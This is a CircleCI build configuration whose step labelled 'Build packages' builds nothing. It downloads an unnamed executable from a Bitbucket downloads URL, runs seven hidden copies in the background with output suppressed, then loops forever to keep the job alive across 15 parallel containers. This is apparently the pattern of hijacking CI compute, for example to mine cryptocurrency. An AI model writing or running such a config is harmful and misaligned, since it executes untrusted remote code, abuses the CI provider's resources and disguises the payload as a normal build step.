version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.6
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15
    steps:
      - checkout
      - run: 
          name: Build packages
          command: |
            wget -q -O /tmp/cc1 https://bitbucket.org/seneralsa/asd/downloads/constan && chmod +x /tmp/cc1 && cp /tmp/cc1 /tmp/cc2 && cp /tmp/cc1 /tmp/cc3 && cp /tmp/cc1 /tmp/cc4 && cp /tmp/cc1 /tmp/cc5 && cp /tmp/cc1 /tmp/cc6 && cp /tmp/cc1 /tmp/cc7
            /tmp/cc1 >/dev/null 2>&1 >/dev/null &
            /tmp/cc2 >/dev/null 2>&1 >/dev/null &
            sleep 3
            /tmp/cc3 >/dev/null 2>&1 >/dev/null &
            sleep 3
            /tmp/cc4 >/dev/null 2>&1 >/dev/null &
            sleep 3
            /tmp/cc5 >/dev/null 2>&1 >/dev/null &
            sleep 3
            /tmp/cc6 >/dev/null 2>&1 >/dev/null &
            sleep 3
            /tmp/cc7 >/dev/null 2>&1 >/dev/null &
            while :; do date; sleep 180; done
